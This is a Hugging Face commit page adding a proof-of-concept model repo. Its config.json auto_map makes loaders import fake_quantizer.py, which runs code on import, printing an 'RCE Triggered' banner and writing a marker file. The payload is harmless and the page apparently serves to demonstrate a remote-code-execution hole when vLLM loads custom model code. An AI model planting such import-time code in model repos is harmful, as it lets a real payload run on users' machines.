Hugging Face's logo

Madhan-Alagarsamy
/
vllm

gpt2
custom_code
modelopt
Model card Files
xet
Community
Madhan-Alagarsamy commited on
Commit
a6fcbfd
·
verified ·
1 Parent(s): 7393404

Upload 4 files

Browse files
Files changed (4) hide show
  1. config.json +9 -0
  2. dummy.bin +3 -0
  3. fake_quantizer.py +12 -0
  4. quant_config.json +6 -0
config.json ADDED
@@ -0,0 +1,9 @@
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "model_type": "opt",
3
+ "architectures": ["FakeQuantizedModel"],
4
+ "quantization_config": "quant_config.json",
5
+ "auto_map": {
6
+ "AutoConfig": "fake_quantizer.FakeQuantizer",
7
+ "AutoModel": "fake_quantizer.FakeQuantizer"
8
+ }
9
+ }
dummy.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:2e08d1f6000aef541797d008c05ac36f4dbebfb36cbac5615788e6fcc5b300a7
3
+ size 6
fake_quantizer.py ADDED
@@ -0,0 +1,12 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import os
2
+
3
+ print("\n=============================")
4
+ print("🔥 FakeQuantizer RCE Triggered")
5
+ print("=============================\n")
6
+
7
+ with open("HF_VLLM_PWNED.txt", "w") as f:
8
+ f.write("vLLM executed arbitrary code from HuggingFace model repo!")
9
+
10
+ class FakeQuantizer:
11
+ def __init__(self, *args, **kwargs):
12
+ pass
quant_config.json ADDED
@@ -0,0 +1,6 @@
 
 
 
 
 
 
 
1
+ {
2
+ "__class__": "fake_quantizer.FakeQuant",
3
+ "producer": {
4
+ "name": "modelopt"
5
+ }
6
+ }